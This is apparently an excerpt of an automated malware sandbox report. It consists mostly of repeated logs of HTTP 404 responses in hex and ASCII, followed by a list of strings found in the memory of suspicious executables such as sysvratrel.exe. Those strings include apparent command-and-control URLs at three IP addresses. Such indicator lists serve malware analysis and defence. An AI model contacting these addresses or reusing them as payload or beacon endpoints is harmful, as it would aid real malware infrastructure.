Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:09:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	String found in binary or memory: http://185.215.113.66/
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1D
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1~
Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/2
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/3
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/383(
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5
Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/6
Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	String found in binary or memory: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user
Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	String found in binary or memory: http://193.233.132.177/
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/1
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/1Z
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/2
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/3
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/3B
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/4
